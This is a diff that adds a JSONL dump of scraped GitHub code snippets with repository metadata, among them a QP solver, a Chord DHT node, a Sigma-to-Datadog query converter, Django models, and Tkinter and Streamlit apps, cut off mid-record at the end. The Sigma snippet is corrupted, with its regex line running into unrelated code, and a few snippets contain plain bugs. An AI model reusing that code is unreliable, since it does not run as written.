diff --git "a/3889.jsonl" "b/3889.jsonl" new file mode 100644--- /dev/null +++ "b/3889.jsonl" @@ -0,0 +1,1259 @@ +{"seq_id":"20822683872","text":"'''''''''''''''''''''''''''''''''''''''''''''''''''\n > System:\t\tUbuntu\n > Author:\t\tty-l6\n > Mail:\t\tliuty196888@gmail.com\n > File Name:\t\tlongest_common_prefix.py\n > Created Time:\t2017-08-15 Tue 22:13\n'''''''''''''''''''''''''''''''''''''''''''''''''''\n\nclass Solution:\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if not strs: return \"\"\n col_len = min(len(str) for str in strs)\n\n result = 0\n for i in range(col_len):\n if 1 != len(set(s[i] for s in strs)):\n return strs[0][:result]\n else: result += 1\n return strs[0][:result]\n\nif __name__ == '__main__':\n solution = Solution()\n import pprint\n pprint.pprint(solution.longestCommonPrefix(['a']))\n","repo_name":"ltltlt/leetcode","sub_path":"python/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8366437215","text":"\"\"\"Drop-in replacement for quadprog package.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef solve_qp(hessian, weights, coeffs, constants, num_eq, rho=0.1, max_iter=10000, tol_x=1e-8, verbose=False):\n\t\"\"\"\n\tSolves a quadratic program\n\tmin 0.5 * x.T.dot(hessian).dot(x) - weights.dot(x)\n\ts.t. coeffs.T.dot(x) = constants, for first num_eq entries\n\tthen coeffs.T.dot(x) >= constants\n\n\tSolves using a dual gradient descent on the augmented Lagrangian with a\n\tprimal-dual gradient ascent-descent, with adagrad for descent\n\n\t:param hessian: n by n matrix\n\t:type hessian: ndarray of shape (n, n)\n\t:param weights: length-n vector\n\t:type weights: ndarray of shape (n,)\n\t:param coeffs: constraint coefficients\n\t:type coeffs: ndarray of shape (n, num_constraints)\n\t:param constants: contraint constants\n\t:type constants: ndarray of shape (num_constraints,)\n\t:param num_eq: number of equality constraints\n\t:type num_eq: int\n\t:param rho: augmented Lagrangian scalar (step size)\n\t:type rho: float\n\t:param max_iter: maximum iterations of ascent-descent\n\t:type max_iter: int\n\t:param tol_x: convergence tolerance for change in primal and dual variables. Exits if\n\tchange is less than tol_x\n\t:type tol_x: float\n\t:param verbose: flag to print diagnostic information and plot objective\n\t:type verbose: boolean\n\t:return: tuple containing (0) the solution, (1) the objective value, and (2) the Lagrange variables\n\t:rtype: tuple of length 3\n\t\"\"\"\n\tnum_constraints = constants.size\n\n\tx = np.zeros(weights.size)\n\tgamma = np.zeros(num_constraints)\n\n\tgrad_sum = 1\n\n\tif verbose:\n\t\tobjectives = []\n\n\tfor t in range(max_iter):\n\t\t# save old parameters\n\t\told_x = x.copy()\n\t\told_gamma = gamma.copy()\n\n\t\tobjective = 0.5 * x.dot(hessian).dot(x) - weights.dot(x)\n\t\tviolations = coeffs.T.dot(x) - constants\n\t\tclipped_violations = violations.copy()\n\t\tclipped_violations[num_eq:] = np.clip(violations[num_eq:], a_min=None, a_max=0)\n\n\t\tlinear_lagrange = gamma.dot(violations)\n\t\taugmented_term = 0.5 * rho * clipped_violations.dot(clipped_violations)\n\n\t\tif verbose:\n\t\t\taugmented_lagrangian = objective + linear_lagrange + augmented_term\n\n\t\tviolations = clipped_violations != 0\n\n\t\t# update x\n\n\t\tgrad_x = hessian.dot(x) - weights + gamma.dot(coeffs.T) \\\n\t\t\t+ rho * coeffs[:, violations].dot(coeffs[:, violations].T).dot(x) \\\n\t\t\t- rho * constants[violations].dot(coeffs[:, violations].T)\n\n\t\trate = 1\n\n\t\tgrad_sum += grad_x ** 2\n\n\t\tx -= rate * grad_x / np.sqrt(grad_sum)\n\n\t\t# update gamma\n\t\tviolations = coeffs.T.dot(x) - constants\n\t\tgamma += rho * violations\n\t\tgamma[num_eq:] = np.clip(gamma[num_eq:], a_min=None, a_max=0)\n\n\t\tif verbose:\n\t\t\tobjectives.append(augmented_lagrangian)\n\t\t\tprint(\"t = %d, f(x) = %e, ||x|| = %e, ||df/dx|| = %e, violation = %e\" %\n\t\t\t\t (t, augmented_lagrangian, np.linalg.norm(x), np.linalg.norm(grad_x), np.linalg.norm(clipped_violations)))\n\n\t\tif np.linalg.norm(gamma - old_gamma) + np.linalg.norm(x - old_x) < tol_x:\n\t\t\tbreak\n\n\tif verbose:\n\t\tplt.plot(objectives)\n\t\tplt.show()\n\n\treturn x, objective, gamma\n","repo_name":"berty38/al_quadprog","sub_path":"my_quadprog.py","file_name":"my_quadprog.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2787955660","text":"from argparse import ArgumentParser\nfrom threading import Thread\nfrom xmlrpc.client import ServerProxy\nfrom xmlrpc.server import SimpleXMLRPCServer\n\nM = 5\nPORT = 1234\nRING = [2, 7, 11, 17, 22, 27]\n\n\nclass Node:\n def __init__(self, node_id):\n \"\"\"Initializes the node properties and constructs the finger table according to the Chord formula\"\"\"\n self.finger_table = []\n self.node_id = node_id\n self.finger_table = [Node.finger_table_successor((node_id + (2**i))% (2**M)) for i in range(M)]\n self.data = {}\n self.successor = RING[(RING.index(node_id) + 1) % len(RING)]\n print(f\"Node created! Finger table = {self.finger_table}\")\n\n @classmethod\n def finger_table_successor(cls, id):\n ans = -1\n for val in RING:\n if val >= id:\n ans = val\n break\n if ans == -1:\n return min(RING)\n return ans\n \n\n\n def closest_preceding_node(self, id):\n \"\"\"Returns node_id of the closest preceeding node (from n.finger_table) for a given id\"\"\"\n for val in reversed(self.finger_table):\n if self.node_id < id:\n for i in range(self.node_id + 1, id):\n if i == val:\n return val\n else:\n for i in range(self.node_id + 1, 2 ** M):\n if i == val:\n return val\n for i in range(1, id):\n if i == val:\n return val\n return self.node_id\n\n def find_successor(self, id):\n \"\"\"Recursive function returning the identifier of the node responsible for a given id\"\"\"\n if id == self.node_id:\n return id\n \n if id > self.node_id and id <= self.successor or (id < self.node_id and id <= self.successor):\n return self.successor\n\n n = self.closest_preceding_node(id)\n\n if n == self.node_id:\n return self.node_id\n \n nextNode = ServerProxy(f'http://node_{n}:{PORT}')\n print(f\"Forwarding request (key={id}) to node {n}\")\n return nextNode.find_successor(id)\n\n def put(self, key, value):\n \"\"\"Stores the given key-value pair in the node responsible for it\"\"\"\n print(f\"put({key}, {value})\")\n if key >= 2 ** M or key < 0:\n return False\n nextNode = self.find_successor(key)\n if nextNode == self.node_id: \n return self.store_item(key, value)\n else:\n proxy = ServerProxy(f'http://node_{nextNode}:{PORT}')\n return proxy.store_item(key, value)\n\n def get(self, key):\n \"\"\"Gets the value for a given key from the node responsible for it\"\"\"\n print(f\"get({key})\")\n n = self.find_successor(key)\n if n == self.node_id:\n return self.retrieve_item(key)\n node = ServerProxy(f'http://node_{n}:{PORT}')\n return node.retrieve_item(key)\n\n def store_item(self, key, value):\n \"\"\"Stores a key-value pair into the data store of this node\"\"\"\n self.data[key] = value\n return True\n\n def retrieve_item(self, key):\n \"\"\"Retrieves a value for a given key from the data store of this node\"\"\"\n ans = self.data.get(key)\n if ans is None:\n return -1\n return ans\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('node_id', type = int)\n args = parser.parse_args()\n node = Node(args.node_id)\n server = SimpleXMLRPCServer((f\"node_{args.node_id}\", PORT), logRequests = False)\n server.register_instance(node)\n server.serve_forever()\n","repo_name":"Ejedavy/distributed_Hash_Table_ChordAlgo","sub_path":"node_DavidEje.py","file_name":"node_DavidEje.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6282402761","text":"from re import compile\nfrom sigma.backends.base import SingleTextQueryBackend\nfrom sigma.parser.condition import NodeSubexpression\n\n\nclass DatadogLogsBackend(SingleTextQueryBackend):\n \"\"\"Converts Sigma rule into Datadog log search query.\"\"\"\n\n identifier = \"datadog-logs\"\n active = True\n config_required = False\n\n andToken = \" AND \"\n orToken = \" OR \"\n notToken = \"-\"\n subExpression = \"(%s)\"\n listExpression = \"(%s)\"\n # List selection items are linked with a logical 'OR' per the Sigma specification:\n # https://github.com/SigmaHQ/sigma/wiki/Specification#lists.\n listSeparator = \" OR \"\n valueExpression = \"%s\"\n mapExpression = \"%s:%s\"\n nullExpression = \"-%s:*\"\n notNullExpression = \"%s:*\"\n\n # The escaped characters list comes from https://docs.datadoghq.com/logs/explorer/search_syntax/#escaping-of-special-characters.\n specialCharactersRegexp = compile(r'([+\\-=&|>\", val)\n )\n\n def generateMapItemNode(self, node):\n key, value = node\n return super().generateMapItemNode(((self.wrap_key(key)), value))\n\n def generateNULLValueNode(self, node):\n return super().generateNULLValueNode((self.wrap_key(node)))\n\n def generateNotNULLValueNode(self, node):\n return super().generateNotNULLValueNode(self.wrap_key(node))\n\n def wrap_key(self, key):\n if key not in self.tags and key not in ['index', 'service', 'source', 'env']:\n # print(\"WARNING tag %s not converted\" % format(key))\n return \"@%s\" % key\n elif key not in ['index', 'service', 'source', 'env']:\n return self.tags[key]\n else:\n return key\n","repo_name":"krdmnbrk/play-with-splunk","sub_path":"SUIT/SigmaApp/packages/sigma-app/src/main/resources/splunk/bin/sigma/sigma/backends/datadog.py","file_name":"datadog.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"37212539324","text":"from django.db import models\nfrom apps.bases.models import ClaseModelo\nfrom apps.empresas.models import Empresa\n\nclass Proveedor(ClaseModelo): \n descripcion=models.CharField(\n max_length=100,\n unique=True\n )\n direccion=models.CharField(\n max_length=250,\n null=True, blank=True\n )\n contacto=models.CharField(\n max_length=100\n )\n telefono=models.CharField(\n max_length=10,\n null=True, blank=True\n )\n email=models.CharField(\n max_length=250,\n null=True, blank=True\n )\n\n def __str__(self):\n return '{}'.format(self.descripcion)\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super(Proveedor, self).save()\n\n class Meta:\n verbose_name_plural = \"Proveedores\"\n\nclass Productos(ClaseModelo): \n codigo = models.CharField(\n max_length=20,\n unique=True\n )\n \n descripcion = models.CharField(\n max_length=50, \n unique=True, \n blank=False,\n verbose_name=\"Descripción Producto\"\n ) \n\n precio=models.FloatField( \n #max_digits=8,\n #decimal_places=2,\n default=0,\n blank=True,\n verbose_name=\"Precio\"\n ) \n\n def __str__ (self):\n return '{}'.format(self.descripcion) \n \n def save(self):\n self.descripcion = self.descripcion.upper() \n super(Productos, self).save()\n\n class Meta:\n verbose_name_plural = \"Productos\" \n\n\nclass ComprasEnc(ClaseModelo):\n id = models.AutoField(\n primary_key=True,\n verbose_name=\"Número Solicitud de Compra\" \n )\n\n pk_empresa = models.ForeignKey(\n Empresa, \n blank=False,\n verbose_name=\"Empresa\",\n on_delete=models.CASCADE\n )\n fecha_solicitud = models.DateField(verbose_name=\"Fecha solicitud\", blank=False) \n #fecha_compra=models.DateField(null=True,blank=True)\n observacion=models.TextField(blank=True,null=True)\n #no_factura=models.CharField(max_length=100)\n #fecha_factura=models.DateField()\n sub_total=models.FloatField(default=0)\n descuento=models.FloatField(default=0)\n total=models.FloatField(default=0)\n\n pk_proveedor = models.ForeignKey(\n Proveedor, \n blank=False,\n verbose_name=\"Proveedor\",\n on_delete=models.CASCADE\n )\n \n def __str__(self):\n return '{}'.format(self.observacion)\n\n def save(self):\n self.observacion = self.observacion.upper()\n self.total = self.sub_total - self.descuento\n super(ComprasEnc,self).save()\n\n class Meta:\n verbose_name_plural = \"Encabezado Compras\"\n verbose_name=\"Encabezado Compra\"\n\n\n\nclass ComprasDet(ClaseModelo):\n compra=models.ForeignKey(ComprasEnc,on_delete=models.CASCADE)\n\n\n pk_productos = models.ManyToManyField(\n Productos, \n blank=True,\n verbose_name=\"Productos\" \n )\n\n #producto=models.ForeignKey(Producto,on_delete=models.CASCADE)\n #cantidad=models.BigIntegerField(default=0)\n\n unidades=models.BigIntegerField( \n default=0,\n blank=True,\n verbose_name=\"Unidades\"\n )\n pk_precio = Productos().precio\n #precio_prv=models.FloatField(default=0)\n importe=models.FloatField( \n #max_digits=8,\n #decimal_places=2,\n default=0,\n blank=True,\n verbose_name=\"Importe\"\n ) \n\n #sub_total=models.FloatField(default=0)\n descuento=models.FloatField(default=0)\n total=models.FloatField(default=0)\n costo=models.FloatField(default=0)\n\n def __str__(self):\n return '{}'.format(self.producto)\n\n def save(self):\n self.importe = float(float(int(self.unidades)) * float(self.pk_precio))\n self.total = self.importe - float(self.descuento)\n super(ComprasDet, self).save()\n \n class Mega:\n verbose_name_plural = \"Detalle Solicitud\"\n verbose_name=\"Detalle Solicitud\"\n\n","repo_name":"JavierGonzalezAlvarez/django_admin_angular","sub_path":"back/apps/solicitud/templates/sol/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73054461353","text":"import torch\nfrom torch import nn\nfrom torch.nn import init\nimport torchvision\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport utils.d2lzh_pytorch as d2l\nimport numpy as np\nimport sys\nimport time\nfrom collections import OrderedDict\n\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n\nnum_inputs = 784\nnum_outputs = 10\n\n\n# 转换 样本中(batch_size, 28, 28)数据为 (batch_size,784)\n\nclass FlattenLayer(nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n\n def forward(self, x):\n return x.view(x.shape[0], -1)\n\n\n# 定义模型\nclass LinearNet(nn.Module):\n def __init__(self, num_inputs, num_outputs):\n super(LinearNet, self).__init__()\n self.linear = nn.Linear(num_inputs, num_outputs)\n\n def forward(self, x):\n y = self.linear(x.view(x.shape[0], -1)) # x torch.size([256, 1, 28, 28]) 256个展开, 压平 卷积 到全连接 =》一维\n return y\n\n\nnet = LinearNet(num_inputs, num_outputs).cuda()\n\nnet = nn.Sequential(\n OrderedDict([\n ('flatten', FlattenLayer()),\n ('linear', nn.Linear(num_inputs, num_outputs))\n ])\n)\n# 初始化模型权重\ninit.normal_(net.linear.weight, mean=0, std=0.01)\ninit.constant_(net.linear.bias, val=0)\n\n# 定义损失函数 、 优化器\nloss = nn.CrossEntropyLoss()\n\noptimizer = torch.optim.SGD(net.parameters(), lr=0.1)\n\nstart = time.time()\n\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)\n\n# 封装一个 通用的 cuda 训练函数 取代d2l.train_ch3\n\n\nprint('%.2f sec' % (time.time() - start))\nprint(\"done!\")\n","repo_name":"BenjaminChiu/MyPytorch","sub_path":"DIDL/3.7_Softmax.py","file_name":"3.7_Softmax.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35860026155","text":"WELCOME_TEXT = \"Hi there!👋\\nSeems someone does not know where to go?🤠\\niDi is here for you!\"\n\nRETURN = \"↩ Return\"\nMAIN_MENU = \"Main menu:\"\n\nCAFE = \"🍵 Café/Restaurants\"\nPLACES = \"��️ Places\"\nEVENTS = \"🪩 Events\"\nADD_EVENT = \"📝 Add Event\"\n\nLIKE = \"👍 Like\"\nDISLIKE = \"👎 Dislike\"\n\nOPTION_BELOW = \"Choose one of the options below 👇\"\nREGISTER_BUTTON = \"Register 👤\"\nREGISTER = \"First register please 👇\"\nREGISTER_SUCCESS = \"You have been registered successfully ✅\"\nREGISTERED_ALREADY = 'You have already registered ✅'\n\nAGE = \"What is your age?\"\nAGE_AGAIN = \"Please write your age correctly 👇\"\nGENDER = \"What is your gender?\"\nGENDER_AGAIN = \"Please choose your gender correctly 👇\"\nMALE = \"👨 Male\"\nFEMALE = \"👩 Female\"\n\nBOT_STARTED = \"Admin, bot has been launched 🤖\"\nLOCATION = \"Send your current location 👇\"\nLOCATION_BUTTON = \"Send my location\"\n\n\n","repo_name":"shkhryr/swt-idi","sub_path":"src/utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18814902846","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom modules import database_module\nfrom datetime import datetime\n\nclass GUI:\n fecha_actual = datetime.now()\n fecha = fecha_actual.strftime('%d-%m-%Y')\n hora = fecha_actual.strftime('%H:%M')\n\n def __init__(self,root):\n self.root = root\n self.root.title('Registro declaraciones de salud')\n self.database = database_module.Database()\n #Primer bloque: marco informativo\n #Frame\n self.frame_contador = tk.LabelFrame(self.root, text='Información',font=('Courier',16))\n self.frame_contador.pack(anchor='nw', fill='x',pady=10)\n #txt\n self.label_texto = tk.Label(self.frame_contador,text=\"Declaraciones de salud\", font=('Courier',20))\n self.label_texto.pack(anchor='nw', fill='x')\n #txt_fecha\n self.label_fecha = tk.Label(self.frame_contador,text=f\"Fecha: {self.fecha}\", font=('Courier',18)) \n self.label_fecha.pack(anchor='nw', fill='x')\n #propiedad de conteo_diario\n conteo = self.conteoDiario()\n #txt_conteo\n self.label_conteo = tk.Label(self.frame_contador, text=f\"Llevas {conteo}\",font=('Courier',18))\n self.label_conteo.pack(anchor='nw', fill='x')\n #Segundo bloque: botones\n #frame\n self.frame_bloque_2 = tk.LabelFrame(self.root,text=\"Has click en la opción que quieres seleccionar:\")\n self.frame_bloque_2.pack(anchor='nw',fill='x',pady=10)\n #btn agregar ds\n self.boton_agregar_ds = tk.Button(self.frame_bloque_2, text='Agregar declaración\\nde salud', command=self.agregarDs)\n self.boton_agregar_ds.pack(anchor='nw', fill='x')\n #btn actualizar conteo\n self.boton_actualizar = tk.Button(self.frame_bloque_2, text='Actualizar conteo', command=self.actualizar_conteo)\n self.boton_actualizar.pack(anchor='nw', fill='x')\n #btn abrir ventana registros\n self.boton_registros = tk.Button(self.frame_bloque_2, text='Abrir registros', command=self.Crear_ventana_registro)\n self.boton_registros.pack(anchor='nw', fill='x')\n #btn descargar registros\n self.boton_descargar = tk.Button(self.frame_bloque_2, text='Descargar registros', command=self.descargarRegistros)\n self.boton_descargar.pack(anchor='nw', fill='x')\n #Tercer bloque: Respuesta\n #frame\n self.frame_respuesta = tk.LabelFrame(self.root,text='Respuesta:')\n self.frame_respuesta.pack(anchor='nw', fill='x')\n #txt_respuesta\n self.texto_respuesta = tk.Label(self.frame_respuesta,text='Esperando...')\n self.texto_respuesta.pack(anchor='nw', fill='x',pady=10)\n\n def Crear_ventana_registro(self):\n v_registro = tk.Toplevel(self.root)\n v_registro.title('Registro de declaraciones de salud')\n\n #Marco de botones\n frame_registro = tk.LabelFrame(v_registro)\n frame_registro.pack(anchor='nw', fill='x')\n\n #bloque de botones para editar,actualizar y eliminar registros\n boton_actualizar = tk.Button(frame_registro,text=\"Actualizar registro\",command=lambda: self.ActualizarRegistro(mensaje_respuesta))\n boton_actualizar.grid(row=0,column=0)\n \n boton_eliminar = tk.Button(frame_registro,text=\"Eliminar registro\",command=lambda: self.EliminarRegistro(mensaje_respuesta))\n boton_eliminar.grid(row=0,column=1)\n\n mensaje_respuesta = tk.Label(frame_registro,text='',fg='red')\n mensaje_respuesta.grid(row=1,column=0)\n\n #tabla de registros\n self.tree = ttk.Treeview(v_registro, height=10, columns=2)\n self.tree.pack()\n self.tree.heading('#0', text='fecha',anchor='center')\n self.tree.heading('#1', text='hora',anchor='center')\n\n self.ObtenerRegistros()\n\n def actualizar_conteo(self):\n conteo = self.conteoDiario()\n self.label_conteo.config(text=f\"Llevas {conteo}\")\n self.texto_respuesta.config(text='\\nSe ha actualizado con éxito el conteo\\n')\n\n def agregarDs(self):\n self.database.agregarDs()\n self.texto_respuesta.config(text='Se agrego con exito.\\nRecuerda actualizar el conteo.')\n \n def conteoDiario(self):\n return self.database.conteo_diario()\n \n def descargarRegistros(self):\n self.database.descargar_registros()\n self.texto_respuesta.config(text='Se descargo el registro de declaraciones\\nde salud exitosamente.')\n \n def ActualizarRegistro(self, mensaje_respuesta):\n self.ObtenerRegistros()\n mensaje_respuesta.config(text='Se actualizó el registro') \n \n def ObtenerRegistros(self):\n records = self.tree.get_children()\n for element in records:\n self.tree.delete(element)\n db_rows = self.database.Obtener_registros()\n for row in db_rows:\n self.tree.insert('', 0, text = row[1], values = row[2])\n \n def EliminarRegistro(self,mensaje_respuesta):\n mensaje_respuesta.config(text='')\n try:\n self.tree.item(self.tree.selection())['text'][0]\n except IndexError as e:\n mensaje_respuesta.config(text='Selecciona un registro')\n return\n mensaje_respuesta.config(text='')\n fecha = self.tree.item(self.tree.selection())['text']\n hora = self.tree.item(self.tree.selection())['values'][0]\n self.database.Eliminar_registro(fecha,hora)\n mensaje_respuesta.config(text='Registro {} eliminado'.format(fecha)) \n self.ObtenerRegistros()","repo_name":"Gesh714/contador_ds","sub_path":"modules/gui_module.py","file_name":"gui_module.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29670750238","text":"#range函数\n\n#使用迭代器模拟range函数\n\nclass IterRange(object):\n '''使用迭代器模拟range函数'''\n\n def __init__(self, start, end, interval=1):\n \"\"\"\n 初始化传入的参数\n :param start: 开始数字 type: int\n :param end: 结束数字 type: int\n \"\"\"\n self.start = start - 1\n self.end = end\n self.interval = interval\n\n def __next__(self):\n '''每执行一次start + 1'''\n self.start += self.interval\n if self.start >= self.end:\n raise StopIteration\n return self.start\n\n def __iter__(self):\n '''设置为其可迭代'''\n return self\n\n\n#使用生成器模拟range函数\n\nclass GenRange(object):\n '''使用生成器模拟range函数'''\n\n def __init__(self, start, end, interval=1):\n self.start = start\n self.end = end\n self.interval = interval\n\n def get_num(self):\n '''使用rield获取数字'''\n while True:\n if self.start == self.end:\n break\n self.start += self.interval\n yield self.start - 1\n\n\nif __name__ == '__main__':\n iterrange = IterRange(1, 6)\n result = list(iterrange)\n print(result)\n print('*' * 30)\n genrange = GenRange(1, 6)\n resu = genrange.get_num()\n li = list(resu)\n print(li)","repo_name":"zhanghui0228/study","sub_path":"python_Basics/class/Decorator/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74387986791","text":"import streamlit as st \r\nimport pandas as pd\r\nimport chardet\r\n\r\nfrom Data_transformation import *\r\n\r\ndef app(state):\r\n\tst.title('Upload your data')\r\n\tst.write('Click the button below to add your dataset and check if your data is correct')\r\n\tupload = st.file_uploader('',accept_multiple_files = False)\r\n\tplaceholder_data = {'vWMF9pPHn2':'placeholder'}\r\n\tstate.data = pd.DataFrame(placeholder_data, columns = ['vWMF9pPHn2'], index = [0])\r\n\tif upload is not None:\r\n\t\t\tstate.name = upload.name\r\n\t\t\tif state.name.split('.')[1] == 'xlsx' or state.name.split('.')[1] == 'xls' :\r\n\t\t\t\tdata = upload.read()\r\n\t\t\t\texcel = pd.ExcelFile(data)\r\n\t\t\t\tsheet = st.selectbox('Sheet from excel file to be used',excel.sheet_names)\r\n\t\t\t\t\r\n\t\t\t\t#options for excel upload\r\n\t\t\t\tif st.checkbox('More options', value = False):\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet)\r\n\t\t\t\t\ttotal = len(state.data)\r\n\t\t\t\t\tif st.checkbox('Select first and last row of the dataset'):\r\n\t\t\t\t\t\tskip = st.number_input('Beginning of the dataset', value = 1)\r\n\t\t\t\t\t\tlast = st.number_input('End of the dataset', value = total)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tskip = 0\r\n\t\t\t\t\t\tlast = total\r\n\t\t\t\t\tif st.checkbox('Does your data has a Header?', value = True):\r\n\t\t\t\t\t\theader = 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\theader = None\r\n\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet, skiprows = skip-1, header = header)[0:last]\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\telse:\r\n\t\t\t\t\tstate.data = pd.read_excel(data, sheet_name = sheet)\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\r\n\t\t\telif state.name.split('.')[1] == 'csv' or state.name.split('.')[1] == 'txt' :\r\n\t\t\t\tresult = chardet.detect(upload.read(100000))\r\n\t\t\t\tsep = st.text_input('What is the field separator ?', value = ',')\r\n\t\t\t\t#options for plain text upload\r\n\t\t\t\tif st.checkbox('More options', value = False):\r\n\t\t\t\t\tif st.checkbox('Select decimal marker'):\r\n\t\t\t\t\t\tdec = st.text_input('Decimal marker', value = ',')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdec = ','\r\n\t\t\t\t\tif st.checkbox('Select thousands marker'):\r\n\t\t\t\t\t\tthou = st.text_input('Thousands marker', value = '.')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tthou = '.'\t\t\t\t\t\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\tstate.data = pd.read_csv(upload, sep = sep, encoding = result['encoding'], decimal = dec, thousands = thou)\r\n\t\t\t\t\ttotal = len(state.data)\r\n\t\t\t\t\tif st.checkbox('Select first and last row of the dataset'):\r\n\t\t\t\t\t\tskip = st.number_input('Beginning of the dataset', value = 1)\r\n\t\t\t\t\t\tlast = st.number_input('End of the dataset', value = total)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tskip = 0\r\n\t\t\t\t\t\tlast = total\r\n\t\t\t\t\tif st.checkbox('Does your data has a Header?', value = True):\r\n\t\t\t\t\t\theader = 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\theader = None\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\t#st.write(pd.read_csv(upload))\r\n\r\n\t\t\t\t\tstate.data = pd.read_csv(upload, skiprows = skip-1, header = header, sep = sep,thousands = thou, encoding = result['encoding'], decimal = dec)[0:last]\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\t\t\telse:\r\n\t\t\t\t\tupload.seek(0)\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tstate.data = pd.read_csv(upload, sep = sep, encoding = result['encoding'])\r\n\t\t\t\t\texcept pd.errors.ParserError:\r\n\t\t\t\t\t\tst.write('Your separator is \"%s\" . It is problably wrong, open your file and check it. If it is ok file an issue. Sorry for the incovenience' %(sep))\r\n\t\t\t\t\t#st.write(state.data.head(5))\r\n\t\r\n\t#show begining of dataset\r\n\tif 'vWMF9pPHn2' not in state.data.columns:\r\n\t\tst.write(state.data.head(5))\r\n\telse:\r\n\t\tst.write('Waiting...')\r\n\r\n\t# Data pre processing\r\n\twith st.beta_expander('Data Pre-Processing'):\r\n\r\n\t\t#deal with missing values\r\n\t\tst.write(\"**If you don't have missing values in your data you can uncheck the box bellow**\" )\r\n\t\tif st.checkbox('Fill empty values', value = True):\r\n\t\t\tcols = []\r\n\t\t\tfor i in state.data.columns:\r\n\t\t\t\tif st.checkbox('%s has missing values to tranform'%(i)):\r\n\t\t\t\t\tcols.append(i)\r\n\t\t\tfor i in cols:\r\n\t\t\t\tmethod = None\r\n\t\t\t\tto_do_na = st.selectbox('Fill %s using:'%(i),('Numbers','Words','Dates','Previous value','Next value'), key = i)\r\n\t\t\t\tif to_do_na == 'Numbers':\r\n\t\t\t\t\tnew_val = st.number_input('Type the number', value = 0, key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Words':\r\n\t\t\t\t\tnew_val = st.text_input('Type the word', key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Dates':\r\n\t\t\t\t\tnew_val = st.date_input('Select date', key = i)\r\n\t\t\t\t\tstate.data.fillna({i:new_val}, inplace = True)\r\n\t\t\t\telif to_do_na == 'Previous value':\r\n\t\t\t\t\tmethod = 'ffill'\r\n\t\t\t\t\tstate.data[i].fillna(method = method, inplace = True)\r\n\t\t\t\telif to_do_na == 'Next value':\r\n\t\t\t\t\tmethod = 'bfill'\r\n\t\t\t\t\tstate.data[i].fillna(method = method, inplace = True)\r\n\r\n\t\t\t#Change column name\r\n\t\tif st.checkbox('Change column names ?', value = False):\r\n\t\t\tnew_columns = {}\r\n\t\t\tfor col in state.data.columns:\r\n\t\t\t\tnew_columns[col] = st.text_input(\"Column '%s' new name\"%col, value = col)\r\n\t\t\tstate.data = state.data.rename(columns = new_columns)\r\n# Modify dataset\r\n\twith st.beta_expander('Data transformation'):\r\n\r\n\t\tif st.checkbox('Simple mathematical operations'):\r\n\t\t\ttype_of_operations = ['Operation using a single number e.g., column + 4', 'Operation using multiple columns element wise e.g., column 1 + column 2 + column 3']\r\n\t\t\tselection_of_type = st.selectbox('Which type of operation do you want?', type_of_operations)\r\n\t\t\toperations = ['sum','subtraction','division','multiplication','exponent','root','logarithm','Natural logarithm','Cosine','Sine','Tangent']\r\n\t\t\toperation_type = st.selectbox('Select type of operation',operations)\r\n\r\n\t\t\tif type_of_operations[0] == selection_of_type:\r\n\t\t\t\ttransf_col = st.selectbox('select column to be used. You can only use columns with numbers',state.data.select_dtypes(exclude = 'O').columns)\r\n\t\t\t\tif operation_type in ['Natural logarithm','Cosine','Sine','Tangent']:\r\n\t\t\t\t\tnew_col = by_itself(state.data[transf_col],operation_type)\r\n\t\t\t\telse:\r\n\t\t\t\t\tnew_col = 